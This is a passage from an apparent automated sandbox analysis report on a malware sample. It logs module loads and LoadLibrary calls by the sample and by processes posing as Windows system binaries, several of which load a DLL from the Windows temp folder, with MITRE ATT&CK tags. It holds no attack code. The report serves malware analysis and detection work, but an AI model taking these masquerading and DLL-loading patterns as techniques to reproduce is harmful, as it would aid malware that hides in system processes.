\"WINLOGON.EXE\" loaded module \"OLE32.DLL\" at base 76800000\n \"WINLOGON.EXE\" loaded module \"COMCTL32.DLL\" at base 74140000\n \"WINLOGON.EXE\" loaded module \"OLEAUT32.DLL\" at base 75580000\n \"WINLOGON.EXE\" loaded module \"CLBCATQ.DLL\" at base 76a50000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74000000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76ae0000\n \"WINLOGON.EXE\" loaded module \"SETUPAPI.DLL\" at base 76f70000\n \"WINLOGON.EXE\" loaded module \"RPCRT4.DLL\" at base 76c10000\n \"WINLOGON.EXE\" loaded module \"NTMARTA.DLL\" at base 746b0000\n \"WINLOGON.EXE\" loaded module \"USER32\" at base 76960000\n \"WINLOGON.EXE\" loaded module \"KERNEL32\" at base 76ae0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 750f0000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 718d0000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c470000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73e30000\n \"CSRSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 75580000\n \"CSRSS.EXE\" loaded module \"SXS.DLL\" at base 75150000\n \"CSRSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 74c50000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 749e0000\n \"CSRSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 77110000\n \"CSRSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75140000\n \"CSRSS.EXE\" loaded module \"DWMAPI.DLL\" at base 73aa0000\n \"CSRSS.EXE\" loaded module \"KERNEL32.DLL\" at base 76ae0000\n \"CSRSS.EXE\" loaded module \"SHELL32.DLL\" at base 75950000\n \"CSRSS.EXE\" loaded module \"OLE32.DLL\" at base 76800000\n \"CSRSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74140000\n \"CSRSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 76a50000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74000000\n \"CSRSS.EXE\" loaded module \"NTMARTA.DLL\" at base 746b0000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76ae0000\n \"CSRSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 76f70000\n \"CSRSS.EXE\" loaded module \"RPCRT4.DLL\" at base 76c10000\n \"CSRSS.EXE\" loaded module \"USER32\" at base 76960000\n \"CSRSS.EXE\" loaded module \"KERNEL32\" at base 76ae0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 750f0000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 718d0000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"IExplorer.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c470000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73e30000\n \"SERVICES.EXE\" loaded module \"OLEAUT32.DLL\" at base 75580000\n \"SERVICES.EXE\" loaded module \"SXS.DLL\" at base 75150000\n \"SERVICES.EXE\" loaded module \"CRYPTSP.DLL\" at base 74c50000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 749e0000\n \"SERVICES.EXE\" loaded module \"ADVAPI32.DLL\" at base 77110000\n \"SERVICES.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75140000\n \"SERVICES.EXE\" loaded module \"KERNEL32.DLL\" at base 76ae0000\n \"SERVICES.EXE\" loaded module \"SHELL32.DLL\" at base 75950000\n \"SERVICES.EXE\" loaded module \"OLE32.DLL\" at base 76800000\n \"SERVICES.EXE\" loaded module \"COMCTL32.DLL\" at base 74140000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76ae0000\n \"SERVICES.EXE\" loaded module \"SETUPAPI.DLL\" at base 76f70000\n \"SERVICES.EXE\" loaded module \"CLBCATQ.DLL\" at base 76a50000\n \"SERVICES.EXE\" loaded module \"RPCRT4.DLL\" at base 76c10000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74000000\n \"SERVICES.EXE\" loaded module \"NTMARTA.DLL\" at base 746b0000\n \"SERVICES.EXE\" loaded module \"USER32\" at base 76960000\n \"SERVICES.EXE\" loaded module \"KERNEL32\" at base 76ae0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 750f0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73e30000\n \"WINLOGON.EXE\" loaded module \"SXS.DLL\" at base 75150000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 718d0000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c470000\n \"LSASS.EXE\" loaded module \"CRYPTSP.DLL\" at base 74c50000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 749e0000\n \"LSASS.EXE\" loaded module \"ADVAPI32.DLL\" at base 77110000\n \"LSASS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75140000\n \"LSASS.EXE\" loaded module \"KERNEL32.DLL\" at base 76ae0000\n \"LSASS.EXE\" loaded module \"SHELL32.DLL\" at base 75950000\n \"LSASS.EXE\" loaded module \"OLE32.DLL\" at base 76800000\n \"LSASS.EXE\" loaded module \"COMCTL32.DLL\" at base 74140000\n \"LSASS.EXE\" loaded module \"OLEAUT32.DLL\" at base 75580000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76ae0000\n \"LSASS.EXE\" loaded module \"SETUPAPI.DLL\" at base 76f70000\n \"LSASS.EXE\" loaded module \"RPCRT4.DLL\" at base 76c10000\n \"LSASS.EXE\" loaded module \"CLBCATQ.DLL\" at base 76a50000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74000000\n \"LSASS.EXE\" loaded module \"NTMARTA.DLL\" at base 746b0000\n \"LSASS.EXE\" loaded module \"USER32\" at base 76960000\n \"LSASS.EXE\" loaded module \"KERNEL32\" at base 76ae0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 750f0000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 718d0000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SMSS.EXE\" loaded module \"KERNEL32\" at base 76ae0000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SMSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c470000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73e30000\n \"SMSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 75580000\n \"SMSS.EXE\" loaded module \"SXS.DLL\" at base 75150000\n \"SMSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 74c50000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 749e0000\n \"SMSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 77110000\n \"SMSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75140000\n \"SMSS.EXE\" loaded module \"DWMAPI.DLL\" at base 73aa0000\n \"SMSS.EXE\" loaded module \"KERNEL32.DLL\" at base 76ae0000\n \"SMSS.EXE\" loaded module \"SHELL32.DLL\" at base 75950000\n \"SMSS.EXE\" loaded module \"OLE32.DLL\" at base 76800000\n \"SMSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74140000\n \"SMSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 76a50000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74000000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76ae0000\n \"SMSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 76f70000\n \"SMSS.EXE\" loaded module \"RPCRT4.DLL\" at base 76c10000\n \"SMSS.EXE\" loaded module \"NTMARTA.DLL\" at base 746b0000\n \"SMSS.EXE\" loaded module \"USER32\" at base 76960000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 750f0000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 718d0000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c470000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73e30000\n \"LSASS.EXE\" loaded module \"SXS.DLL\" at base 75150000\n \"SERVICES.EXE\" loaded module \"DWMAPI.DLL\" at base 73aa0000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 718d0000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"LSASS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c470000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"10001100f412c574@rsaenh.dll\"\n \"10001100e012c574@rsaenh.dll\"\n \"08000900d412c574@rsaenh.dll\"\n \"0b000c00c812c574@rsaenh.dll\"\n \"0c000d00b812c574@rsaenh.dll\"\n \"0d000e00a812c574@rsaenh.dll\"\n \"0d000e009812c574@rsaenh.dll\"\n \"0b000c008c12c574@rsaenh.dll\"\n \"0b000c008012c574@rsaenh.dll\"\n \"09000a007412c574@rsaenh.dll\"\n \"09000a006812c574@rsaenh.dll\"\n \"0c000d005812c574@rsaenh.dll\"\n \"0a000b004c12c574@rsaenh.dll\"\n \"100011003812c574@rsaenh.dll\"\n \"0d000e002812c574@rsaenh.dll\"\n \"0a000b001c12c574@rsaenh.dll\"\n \"110012000812c574@rsaenh.dll\"\n \"0b000c00fc11c574@rsaenh.dll\"\n \"0c000d00ec11c574@rsaenh.dll\"\n \"0e000f00dc11c574@rsaenh.dll\"\n \"0e000f00cc11c574@rsaenh.dll\"\n \"0e000f00bc11c574@rsaenh.dll\"\n \"0e000f00ac11c574@rsaenh.dll\"\n \"0e000f009c11c574@rsaenh.dll\"\n \"0f0010008c11c574@rsaenh.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00000960)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005992)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005992)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005992)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005992)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005992)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005992)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005992)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005992)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005992)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005992)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005992)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005992)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005992)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005992)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00001712)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005496)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005496)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005496)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005496)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005496)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005496)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005496)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005496)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005496)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005496)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005836)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005836)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005836)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005836)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005836)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005836)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005836)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005836)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005792)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005792)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005792)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005792)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005792)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005792)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005792)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005792)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005792)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005792)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005792)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005792)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005792)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005588)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005588)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005588)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005588)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005588)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005588)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005808)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005808)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005808)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005808)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005808)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005808)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005808)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005808)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005808)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005808)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001440)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001440)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001440)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001440)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001440)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001440)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005760)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005760)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005760)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005760)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005760)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005760)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005760)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005760)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005760)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005760)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005760)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005760)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005760)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005760)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005760)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005760)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005760)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004400)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004400)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004400)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004400)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004400)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004400)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004400)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004400)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004400)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000756)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000756)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000756)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000756)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000756)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000756)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000756)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000756)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000756)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00000756)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003332)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003332)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003332)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003332)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003332)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003332)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003332)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003332)\n 